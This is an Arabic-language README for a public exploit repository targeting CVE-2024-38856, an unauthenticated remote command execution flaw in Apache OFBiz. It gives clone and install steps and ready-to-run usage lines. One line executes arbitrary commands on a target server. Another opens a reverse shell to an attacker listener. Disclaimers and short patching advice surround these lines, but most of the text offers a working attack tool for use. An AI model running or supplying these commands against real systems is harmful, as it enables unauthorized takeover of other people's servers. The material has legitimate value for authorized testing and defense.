
استغلال لـ Apache OFBiz - CVE-2024-38856
استغلال لـ Apache OFBiz (CVE-2024-38856) بواسطة: Alisson Faoli
يحتوي هذا المستودع على استغلال لثغرة CVE-2024-38856 الموجودة في Apache OFBiz. يسمح العيب بتنفيذ أوامر عن بعد (RCE) دون مصادقة.
ملاحظة: يتم توفير هذا الاستغلال لأغراض تعليمية وبحثية فقط. قد يكون سوء الاستخدام غير قانوني ويقع على عاتق المستخدم وحده.
CVE: CVE-2024-38856
البرمجيات المتأثرة: Apache OFBiz حتى الإصدار 18.12.14
نوع الثغرة: RCE
الاستغلال: لا يتطلب مصادقة
استنساخ المستودع:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
تثبيت التبعيات:
pip install -r requirements.txt
تشغيل الاستغلال:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
لإصلاح هذه الثغرة، يُنصح مسؤولي Apache OFBiz بما يلي: التحديث إلى الإصدار المصحح المتاح على https://ofbiz.apache.org/download.html. تطبيق قواعد جدار الحماية أو WAF لمنع محاولات الاستغلال المعروفة.
إذا كان لديك أي أسئلة أو تريد الإبلاغ عن تحسين للاستغلال، اتصل بي: LinkedIn: https://linkedin.com/in/alisson-faoli/
يتم توفير هذا الكود لأغراض تعليمية واختبار أمني في البيئات المصرح بها فقط. المؤلف غير مسؤول عن أي سوء استخدام.